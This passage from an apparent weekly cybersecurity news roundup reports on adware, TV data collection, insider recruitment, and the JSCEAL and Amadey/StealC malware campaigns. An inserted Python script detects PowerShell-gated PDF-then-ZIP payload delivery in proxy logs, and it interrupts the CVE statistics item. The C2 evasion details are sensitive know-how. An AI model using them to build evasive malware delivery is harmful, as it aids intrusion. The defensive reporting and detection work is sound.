“Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said. “GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads.

Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition (ACR), according to a new lawsuit.

“ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said. “This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.”

Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify.

The ads offer payouts from $3,000 to $15,000 for access or data. “Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said. “When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.”

Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in a strategy game named Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode.

JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth. “In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said. “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload. It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware.

Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S. Justice Department said. “Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts.

Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 is at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has increased to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score.
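Returning to the JSCEAL item above: the C2 behaviour it describes (requests accepted only with a PowerShell User-Agent, a decoy PDF returned first, the ZIP stage delivered afterwards) is something a defender can look for in web proxy logs. The Python below is an added example, not code from Cato Networks or from the original article; the log line format, host names, addresses and the User-Agent strings are constructed for the demonstration.

```python
"""Flag PowerShell-User-Agent clients that receive a PDF and then a ZIP from the same host.

This mirrors the staged delivery described for JSCEAL: a decoy PDF is served first,
and only afterwards the ZIP carrying the next stage. Log format is constructed.
"""
import re
from urllib.parse import urlparse

# Constructed sample proxy log (not real traffic):
# timestamp client_ip method url status content_type "user-agent"
SAMPLE_LOG = """\
2025-12-20T10:00:01Z 10.0.0.5 GET https://cdn.example.org/update 200 application/pdf "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2025-12-20T10:00:04Z 10.0.0.5 GET https://cdn.example.org/update 200 application/zip "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
2025-12-20T10:01:00Z 10.0.0.7 GET https://docs.example.com/report.pdf 200 application/pdf "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"
2025-12-20T10:02:00Z 10.0.0.9 GET https://pkg.example.net/tool.zip 200 application/zip "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1"
"""

# One regex for the constructed line shape above; lines that do not match are skipped.
LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<ctype>\S+) "(?P<ua>[^"]*)"$'
)
# Invoke-WebRequest style User-Agents carry a "WindowsPowerShell/" or "PowerShell/" token.
POWERSHELL_UA_RE = re.compile(r'(Windows)?PowerShell/', re.IGNORECASE)
ZIP_TYPES = ("application/zip", "application/x-zip-compressed")


def parse_log(text):
    """Parse log text into a list of dicts, one per well-formed line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_pdf_then_zip(events):
    """Return (client, host) pairs where a PowerShell-UA client got a PDF from a host
    and later a ZIP from the same host. Events are assumed to be in time order."""
    seen_pdf = set()
    hits = []
    for ev in events:
        if not POWERSHELL_UA_RE.search(ev["ua"]):
            continue  # only the PowerShell-gated traffic is of interest here
        key = (ev["client"], urlparse(ev["url"]).hostname)
        ctype = ev["ctype"].lower()
        if ctype == "application/pdf":
            seen_pdf.add(key)
        elif ctype in ZIP_TYPES and key in seen_pdf and key not in hits:
            hits.append(key)
    return hits


def detect(text):
    """Convenience wrapper: parse the log and run the sequence check."""
    return find_pdf_then_zip(parse_log(text))


if __name__ == "__main__":
    for client, host in detect(SAMPLE_LOG):
        print(f"suspicious PDF-then-ZIP sequence: client={client} host={host}")
```

A lone ZIP download with a PowerShell User-Agent (client 10.0.0.9 in the sample) is deliberately not flagged, since scripted package fetches are common; the PDF-then-ZIP ordering from one host is what the check keys on.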

“What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said. “Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.”

Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged an exploited self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said. “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised.

U.S. Dismantles E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced.

In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010. Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at taking down services that allow bad actors to abuse the financial system and cash out the ill-gotten proceeds.

🎥 Cybersecurity Webinars

How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses.

This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them.

Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors.

This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach.

🔧 Cybersecurity Tools

Tracecat — It is an open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments.

Metis — It is an open-source, AI-powered security code review tool built by Arm’s Product Security Team. It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices.

Disclaimer: These tools are for learning and research only.

They haven’t been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

The past week made one point clear: the perimeter is gone, but accountability isn’t.

Every device, app, and cloud service now plays a part in defense. Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills. As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked.
